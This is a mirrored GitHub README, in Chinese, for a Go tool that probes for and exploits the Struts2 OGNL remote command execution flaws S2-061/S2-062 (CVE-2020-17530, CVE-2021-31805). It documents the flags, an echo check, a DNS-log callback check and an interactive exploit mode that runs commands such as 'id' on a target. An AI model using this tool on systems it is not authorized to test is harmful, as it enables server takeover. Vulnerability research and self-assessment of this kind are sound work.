Giters

z92g / CVE-2021-31805

S2-061/S2-062 Struts2 远程命令执行漏洞 POC&EXP

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2021-31805

1.简介

Struts2 远程命令执行漏洞(CVE-2020-17530&CVE-2021-31805)POC&EXP

2.用法

  • 参数介绍
-u 目标url
-m [dnslog|exp] //默认有回显界面字符检查
-n [s2-062] //默认s2-061
-s [windows] //默认linux
-p 漏洞参数
  • 有回显检测
Struts2RCE -u http://127.0.0.1:8080 //默认s2-061检测

image

  • 无回显检测
请自行注册ceye,并配置好ceye.ini
Struts2RCE -u http://127.0.0.1:8080 -m dnslog -n s2-062 //s2-062 dnslog检测,检测速度跟网络和ceye服务器有关,不同url需要清除dnslog记录,否则会造成误判。

image image

  • EXP
存在漏洞情况下,可直接输入漏洞参数进行验证
Struts2RCE -u http://127.0.0.1:8080 -m exp -p id //s2-061漏洞,参数为id的验证,输入q退出

image

3.免责声明

此工具仅用于学习、研究和自查。 不应用于非法目的,请遵守相关法律法规。 使用本工具产生的任何风险与本人无关!

About

S2-061/S2-062 Struts2 远程命令执行漏洞 POC&EXP

Languages

Language:Go 100.0%